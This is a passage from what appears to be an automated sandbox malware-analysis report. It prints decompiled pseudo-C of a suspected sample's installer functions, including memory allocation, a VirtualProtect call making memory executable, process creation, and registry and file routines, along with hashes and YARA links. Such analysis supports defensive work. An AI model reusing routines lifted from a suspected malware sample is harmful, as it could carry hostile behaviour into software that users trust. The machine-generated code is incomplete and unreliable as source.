				if( *0x73335050 != 0 && E73332ADB(_a4) == 0) {
					 *0x73335054 = _t93;
					if( *0x7333504c != 0) {
						_t93 =  *0x7333504c;
					} else {
						E733330C0(E73332AD5(), __ecx);
						 *0x7333504c = _t93;
					}
				}
				_t28 = E73332B09(_a4);
				_t94 = _t93 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E73332AFD();
					_t72 = _a4;
					_t79 =  *0x73335058;
					 *((intOrPtr*)(_t29 + _t72)) = _t79;
					 *0x73335058 = _t72;
					E73332AF7();
					_t33 = VirtualAllocEx(??, ??, ??, ??, ??); // executed
					 *0x73335034 = _t33;
					 *0x73335038 = _t79;
					if( *0x73335050 != 0 && E73332ADB( *0x73335058) == 0) {
						 *0x7333504c = _t94;
						_t94 =  *0x73335054;
					}
					_t80 =  *0x73335058;
					_a4 = _t80;
					 *0x73335058 =  *((intOrPtr*)(E73332AFD() + _t80));
					_t37 = E73332AE9(_t80);
					_pop(_t81);
					if(_t37 != 0) {
						_t40 = E73332B09(_t81);
						if(_t40 > 0) {
							_push(_t40);
							_push(E73332B14() + _a4 + _v8);
							_push(E73332B1E());
							if( *0x73335050 <= 0 || E73332ADB(_a4) != 0) {
								_pop(_t88);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t89);
								_pop(_t49);
								 *0x7333504c =  *0x7333504c +  *(_t89 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t107 =  *0x73335058;
					if( *0x73335058 == 0) {
						 *0x7333504c = 0;
					}
					E73332B42(_t107, _a4,  *0x73335034,  *0x73335038);
					return _a4;
				}
				_push(E73332B14() + _a4);
				_t56 = E73332B1A();
				_v8 = _t56;
				_t77 = _t28;
				_push(_t68 + _t56 * _t77);
				_t70 = E73332B26();
				_t87 = E73332B22();
				_t90 = E73332B1E();
				_t61 = _t77;
				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t70 + _t61)));
				}
				_push( *((intOrPtr*)(_t87 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x73332ba8
0x73332bb9
0x73332bc6
0x73332bda
0x73332bc8
0x73332bcd
0x73332bd2
0x73332bd2
0x73332bc6
0x73332be3
0x73332be8
0x73332bee
0x73332c32
0x73332c32
0x73332c37
0x73332c3c
0x73332c42
0x73332c44
0x73332c4a
0x73332c57
0x73332c59
0x73332c5e
0x73332c6b
0x73332c7e
0x73332c84
0x73332c8a
0x73332c8b
0x73332c91
0x73332c9d
0x73332ca3
0x73332cab
0x73332cac
0x73332caf
0x73332cba
0x73332cbc
0x73332cc8
0x73332cce
0x73332cd6
0x73332d02
0x73332d03
0x73332d05
0x73332d09
0x73332d09
0x73332d10
0x73332ce6
0x73332ce6
0x73332ce7
0x73332cf5
0x73332cfe
0x73332cfe
0x73332cd6
0x73332cba
0x73332d12
0x73332d19
0x73332d1b
0x73332d1b
0x73332d34
0x73332d42
0x73332d42
0x73332bf9
0x73332bfa
0x73332bff
0x73332c03
0x73332c08
0x73332c1c
0x73332c1d
0x73332c1e
0x73332c20
0x73332c25
0x73332c27
0x73332c27
0x73332c2a
0x73332c30
0x00000000

APIs

VirtualAllocEx.KERNELBASE(00000000), ref: 73332C57

Memory Dump Source

Source File: 00000000.00000002.773267858.0000000073331000.00000020.00000001.01000000.00000005.sdmp, Offset: 73330000, based on PE: true

Associated: 00000000.00000002.773256620.0000000073330000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.773280632.0000000073334000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.773288025.0000000073336000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73330000_3GJ6S3Kwnb.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 366ccefb64ee1d61d5eca445d9bb89e68a64d905770b52ffbb61155f8406f859
Instruction ID: 658a8079252cdf0bbbef4585dec32b15ce34a1ff3a52f35a94c62e3429e806ff
Opcode Fuzzy Hash: 366ccefb64ee1d61d5eca445d9bb89e68a64d905770b52ffbb61155f8406f859
Instruction Fuzzy Hash: 4B414CF290430C9BEB31AF65D985F993BBDEB46315FA0C82AE409C6150D63EA4818B91

Uniqueness

Uniqueness Score: -1.00%

Function 00401FA4 Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401FA4(void* __ecx) {
				void* _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t17 = __ecx;
				_t19 = E00402DA6(_t15);
				E00405569(0xffffffeb, _t7);
				_t20 = E00405AEA(_t19);
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E0040697F(_t17, _t20);
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E0040644E( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20); // executed
					FindCloseChangeNotification(); // executed
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x00401fa4
0x00401faa
0x00401faf
0x00401fba
0x00401fbe
0x0040292e
0x00401fc4
0x00401fc7
0x00401fca
0x00401fd2
0x00401fe1
0x00401fe3
0x00401fe3
0x00401fd4
0x00401fd8
0x00401fd8
0x00401fd2
0x00401fea
0x00401feb
0x00401feb
0x00402c2d
0x00402c39

APIs

Part of subcall function 00405569: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
Part of subcall function 00405569: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll,004033ED), ref: 004055C4
Part of subcall function 00405569: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll), ref: 004055D6
Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624

Part of subcall function 00405AEA: CreateProcessW.KERNEL32 ref: 00405B13
Part of subcall function 00405AEA: CloseHandle.KERNEL32(?), ref: 00405B20

FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?), ref: 00401FEB

Part of subcall function 0040697F: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406990
Part of subcall function 0040697F: GetExitCodeProcess.KERNEL32 ref: 004069B2

Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: MessageSend$CloseProcesslstrlen$ChangeCodeCreateExitFindHandleNotificationObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 1543427666-0
Opcode ID: c6a94ea288f24ec267e014de351b05f10728b3196364e7699fcaafee50375258
Instruction ID: 8c0427486d29053335645041865d96f0af5997519b71f4a23b4502285a2a7229
Opcode Fuzzy Hash: c6a94ea288f24ec267e014de351b05f10728b3196364e7699fcaafee50375258
Instruction Fuzzy Hash: 4AF09072904012EBCB21ABA59994E9E72A4DF00318F25413BE102B21E1D77C4E528AAE

Uniqueness

Uniqueness Score: -1.00%

Function 004023B2 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004023B2(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402DA6(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
					_t13 = E00402DA6(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
					_t11 = E00402DA6(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x004023b2
0x004023b2
0x004023b4
0x004023b8
0x004023bb
0x004023c0
0x004023c5
0x004023ce
0x004023ce
0x004023d3
0x004023dc
0x004023dc
0x004023e9
0x004015b4
0x004015b6
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040607A Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040607A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x0040607e
0x0040608e
0x00406096
0x00000000
0x0040609d
0x00000000
0x0040609f

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034AC,00000000,00000000,00403303,000000FF,00000004,00000000,00000000,00000000), ref: 0040608E

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: c8e4d841af9964a9af1d27d101842a5e1860e0780d1899a5c61b78fe641b59a9
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: 84E08632140219ABCF10EE518C00EEB379CFF01390F054432F911E2140D638E92187A4

Uniqueness

Uniqueness Score: -1.00%

Function 004060A9 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060A9(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004060ad
0x004060bd
0x004060c5
0x00000000
0x004060cc
0x00000000
0x004060ce

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347A,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060BD

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 36c6d552b97af02dd58307b05a598db1695570393df740455f8c701413f3969e
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: AFE0E632150169ABDF10DE559C00EEB775CEB05351F014476F955E3150DA31E87197A5

Uniqueness

Uniqueness Score: -1.00%

Function 73332A7F Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x73335048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x7333505c, 4, 0x40, 0x7333504c); // executed
					 *0x7333505c = 0xc2;
					 *0x7333504c = 0;
					 *0x73335054 = 0;
					 *0x73335068 = 0;
					 *0x73335058 = 0;
					 *0x73335050 = 0;
					 *0x73335060 = 0;
					 *0x7333505e = 0;
				}
				return 1;
			}

0x73332a88
0x73332a8d
0x73332a9d
0x73332aa5
0x73332aac
0x73332ab1
0x73332ab6
0x73332abb
0x73332ac0
0x73332ac5
0x73332aca
0x73332aca
0x73332ad2

APIs

VirtualProtect.KERNELBASE(7333505C,00000004,00000040,7333504C), ref: 73332A9D

Memory Dump Source

Source File: 00000000.00000002.773267858.0000000073331000.00000020.00000001.01000000.00000005.sdmp, Offset: 73330000, based on PE: true

Associated: 00000000.00000002.773256620.0000000073330000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.773280632.0000000073334000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.773288025.0000000073336000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73330000_3GJ6S3Kwnb.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 23d52162231ca456f26f1745b0557dafb53f578be7cb4bd1f8406eee32816199
Instruction ID: e0be85599fa33c0da597d8794c5a172c91e63e52a4a42bf344b30c15d71a60d1
Opcode Fuzzy Hash: 23d52162231ca456f26f1745b0557dafb53f578be7cb4bd1f8406eee32816199
Instruction Fuzzy Hash: 9AF0ACF2509280DEE370EF2A84447853FE8B705305F64C92BE19CD6241E33E4044CF91

Uniqueness

Uniqueness Score: -1.00%

Function 004023F4 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004023F4(short __ebx) {
				short _t7;
				WCHAR* _t8;
				WCHAR* _t17;
				void* _t21;
				void* _t24;

				_t7 =  *0x40a010; // 0xa
				 *(_t21 + 8) = _t7;
				_t8 = E00402DA6(1);
				 *(_t21 - 0x10) = E00402DA6(0x12);
				GetPrivateProfileStringW(_t8,  *(_t21 - 0x10), _t21 + 8, _t17, 0x3ff, E00402DA6(0xffffffdd)); // executed
				_t24 =  *_t17 - 0xa;
				if(_t24 == 0) {
					 *((intOrPtr*)(_t21 - 4)) = 1;
					 *_t17 = __ebx;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x004023f4
0x004023fb
0x004023fe
0x0040240e
0x00402425
0x0040242b
0x00401751
0x004028fc
0x00402903
0x00402903
0x00402c2d
0x00402c39

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402425

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 7d71ac8ddd31db18f378b319f763d6172168bca54096192b0f97eaa7b6b6bd09
Instruction ID: 209997e2e20356d43fdb77e3237b303e11e03b8f2c16ee2f2baf27e4b220ec87
Opcode Fuzzy Hash: 7d71ac8ddd31db18f378b319f763d6172168bca54096192b0f97eaa7b6b6bd09
Instruction Fuzzy Hash: 05E01A30C00229FADB10AFA0CD09EAD3668BF41340F14052AF510AA0D1E7F889409789

Uniqueness

Uniqueness Score: -1.00%

Function 00406374 Relevance: 1.5, APIs: 1, Instructions: 19
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406374(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E004062F3(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x0040637e
0x00406385
0x00406398
0x00000000
0x00406398
0x00406389
0x00000000

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406402,?,00000000,?,?,Call,?), ref: 00406398

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
Instruction ID: 95f024e915835d806257714b27b18acfdec26fcf9bd71fa5ecdde53cd8054228
Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
Instruction Fuzzy Hash: 00D0123210030DBBDF11AF90DD01FAB3B1DAB08310F014436FE06A5091D776D530AB64

Uniqueness

Uniqueness Score: -1.00%

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015ae
0x004015b4
0x004015b6
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 484c1fb7531d88e09ef65b29159250032d25401e38421a99c1db0096a302077e
Instruction ID: dab120aab1e819a0f3e7a590800bcc330433e48d8fa1e5c71f26214da8b737bd
Opcode Fuzzy Hash: 484c1fb7531d88e09ef65b29159250032d25401e38421a99c1db0096a302077e
Instruction Fuzzy Hash: B4D01272B08110DBDB11DBA8AA48B9D72A4AB50364B208537D111F61D0E6B9C5559619

Uniqueness

Uniqueness Score: -1.00%

Function 004044AF Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044AF(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x4291f8;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x004044af
0x004044b6
0x004044c1
0x00000000
0x004044c1
0x004044c7

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
Instruction ID: 22c14ff0de7d99e8655fd7423acc63eaa31bea8074cc9abcc6b2c74ee929f0f7
Opcode Fuzzy Hash: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
Instruction Fuzzy Hash: 54C09B71740706BBEE608F519D49F1777586750700F298579B755F60D0C674E410DA1C

Uniqueness

Uniqueness Score: -1.00%

Function 00404498 Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404498(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x42a228, 0x28, _a4, 1); // executed
				return _t2;
			}

0x004044a6
0x004044ac

APIs

SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
Instruction ID: a70792fcf8e9dbddb4bc54a752e2f47ec30058e0f009e109d264f56951a5bac9
Opcode Fuzzy Hash: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
Instruction Fuzzy Hash: 28B09236281A00EBDE614B00EE09F457A62A768701F008468B641240B0CAB240A5DB19

Uniqueness

Uniqueness Score: -1.00%

Function 004034AF Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004034AF(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x004034bd
0x004034c3

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,00403847,?), ref: 004034BD

Memory Dump Source

